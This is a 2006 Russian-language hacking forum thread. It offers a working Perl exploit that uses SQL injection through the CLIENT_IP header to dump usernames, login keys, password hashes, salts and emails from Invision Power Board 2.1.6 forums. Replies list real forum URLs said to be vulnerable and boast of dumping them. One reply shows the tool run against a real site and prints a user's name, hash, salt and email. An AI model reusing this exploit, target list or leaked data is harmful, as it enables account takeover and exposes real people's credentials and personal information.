Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
IPB 2.1.6 Modified for User Database Dump Rst Sploit |
29.08.2006, 02:07
|
|
Познающий
Регистрация: 06.07.2006
Сообщений: 87
Провел на форуме:
464777
Репутация:
33
|
|
IPB 2.1.6 Modified for User Database Dump Rst Sploit
В общем на основе сплоита от РСТ для IPB <= 2.1.6 решил написать дампилку юзерской базы.
Писал для себя вообще, ну решил здесь выложить, может кому еще пригодится...
Впринципе удобно, весь процесс отображается в окне, а результат сохраняется в файле result.txt в каталоге в котором находится сплоит.
Формат данных:
Name: *
Login Key: *
Pass Hash: *
Pass Salt: *
E-Mail: *
Кому не нравится - большая просьба просто воздержаться от каких либо комментариев, ругани в свой адресс от античатовцев я наслушался уже достаточно.
Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Std;
getopts("p:i:P:f:t:");
$path = $opt_p;
$from = $opt_f;
$to = $opt_t;
$prefix = $opt_P || 'ibf_';
$|++;
if(!$path || !$from || !$to || ($from > $to)) { &usage; }
&head();
print "TEST FORUM ...";
if(get_info($prefix,$id,0) == 1) { print " FORUM VULNERABLE\n"; }
else { print " FORUM UNVULNERABLE\n"; exit(); }
open(RES,">result.txt");
for($i=$from;$i<$to;$i++) { get_info($prefix,$i,1); }
sub get_info($$$)
{
$xpl = LWP::UserAgent->new( ) or die;
$rep = '';
if($_[2] == 1)
{
$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ${_[0]}members WHERE id=$_[1]/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if(length($rep)!=32) { print "$_[1])\nName: $rep\n"; print RES "$_[1])\nName: $rep\n"; }
else { print ""; }
$name = $rep;
$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT member_login_key,1,1,1 FROM ${_[0]}members WHERE id=$_[1]/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.{32})"/) { $rep = $3; }
if(length($name)==32) { print ""; }
else { print "Login Key: $rep\n"; print RES "Login Key: $rep\n"; }
$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT converge_pass_hash,1,1,1 FROM ${_[0]}members_converge WHERE converge_id=$_[1]/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if(length($name)==32) { print ""; }
else { print "Pass Hash: $rep\n"; print RES "Pass Hash: $rep\n"; }
$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT converge_pass_salt,1,1,1 FROM ${_[0]}members_converge WHERE converge_id=$_[1]/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if(length($rep)!=32) { print "Pass Salt: $rep\n"; print RES "Pass Salt: $rep\n"; }
else { print ""; }
$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT email,1,1,1 FROM ${_[0]}members WHERE id=$_[1]/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if(length($rep)!=32) { print "E-Mail: $rep\n\n"; print RES "E-Mail: $rep\n\n ****** \n\n"; }
else { print ""; }
}
elsif($_[2] == 0)
{
$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if($rep eq 'VULN') { return 1; }
else { return 0; }
}
}
sub usage()
{
&head();
print "| Usage: |\n";
print "| <sploit>.pl -p [path] -f [u_id] -t [u_id] |\n";
print "| -p [path] ~ path to index.php |\n";
print "| -f [num] ~ get data from this id |\n";
print "| -t [num] ~ get data to this id |\n";
print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
exit();
}
sub head()
{
print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
print "| IPB <= 2.1.6 Users Dumper |\n";
print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
print "| Based on RST IPB <= 2.1.6 Mail Sploit |\n";
print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
print "| Modified by Driver |\n";
print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
}
|
|
|
29.08.2006, 14:33
|
|
Новичок
Регистрация: 06.08.2005
Сообщений: 22
Провел на форуме:
48121
Репутация:
-1
|
|
чЕт он запускаться не хочет.Напиши пример че там писать надо
|
|
|
|
29.08.2006, 14:53
|
|
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
Провел на форуме:
530613
Репутация:
25
|
|
2Driver Бугого как ты написал не зная perl ??
З.Ы копирайты даже моя бабушка может подправить))
|
|
|
|
29.08.2006, 15:36
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796
Репутация:
1095
|
|
Не, у меня вроде запустился, но че-то я так и не нашел уязвимого форума...
Вообще штука была бы хорошая если б на свежую багу...
А еще, неплохо чтоб писалось там "connecting", а если не коннектинг - то почему и т.п... а то даже непонятно, пытался сплойт в инет выйти или не..
|
|
|
|
29.08.2006, 15:41
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825
Репутация:
4451
|
|
http://guild.murdoch.edu.au/forums/
http://recserver.colorado.edu/forum/
http://www.getskinned.org/forums/
Вроде как vulnerablы своим сканером насканил - проверяйте )
|
|
|
|
29.08.2006, 19:40
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132
Репутация:
116
|
|
Ну я perl тоже почти не знаю. А этот сплойт малось переделал(научил пароли к закрытым форумам тырить).
|
|
|
|
29.08.2006, 20:12
|
|
Познающий
Регистрация: 06.07.2006
Сообщений: 87
Провел на форуме:
464777
Репутация:
33
|
|
Сообщение от em00s7
2Driver Бугого как ты написал не зная perl ??
З.Ы копирайты даже моя бабушка может подправить))
А ты кто такой?
P.S.: Я сказал, что чуть чуть передалал исходный сплоит, и не более того.
Я же попросил - кому не нравится - не отписывайтесь...
P.S.S.: Запускать как обычный сплоит, перлом.
|
|
|
|
29.08.2006, 20:33
|
|
Познающий
Регистрация: 06.07.2006
Сообщений: 87
Провел на форуме:
464777
Репутация:
33
|
|
Сообщение от gemaglabin
http://guild.murdoch.edu.au/forums/
http://recserver.colorado.edu/forum/
http://www.getskinned.org/forums/
Вроде как vulnerablы своим сканером насканил - проверяйте )
Со всех трех снял дампы. Вот первые 10 юзеров с каждого форума (дампит естественно только существующих юзеров, а перебирает весь указанный Вами диапазон ID по порядку):
[mod]Диапазон был. Теперь удалён. Это не Халява, это Уязвимости форумов, а не уязвимые форумы. За флуд бить буду.(Последнее относится ко всем, кто отметился в топике)[/mod]
Последний раз редактировалось Azazel; 31.08.2006 в 20:59..
|
|
|
|
30.08.2006, 01:11
|
|
Познающий
Регистрация: 29.08.2005
Сообщений: 97
Провел на форуме:
772501
Репутация:
38
|
|
очень удобно, хотя мало уже их осталось
bash-2.05b$ perl dump.pl -p http://www.forum.vipuskniki-2000.ru/ -f 1 -t 1
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
| IPB <= 2.1.6 Users Dumper |
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
| Based on RST IPB <= 2.1.6 Mail Sploit |
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
| Modified by Driver |
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
TEST FORUM ... FORUM VULNERABLE
1)
Name: empirator
Login Key: 10760b34b06c8b2a97b9939c08aaf3a5
Pass Hash: 8c336d0ce5e853612e08159035ddf2aa
Pass Salt: jm7||
E-Mail: empirator@km.ru
и в файле все остается |
|
|
|
30.08.2006, 11:22
|
|
Новичок
Регистрация: 06.08.2005
Сообщений: 22
Провел на форуме:
48121
Репутация:
-1
|
|
ipb216_dumper.pl -p http://www.getskinned.org/forums/ -f 1 -t 10
Я так и запускаю.Не запускается хрень каккую- то пишет.Может защита от кидесов стойт?Я в перле не шарю.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
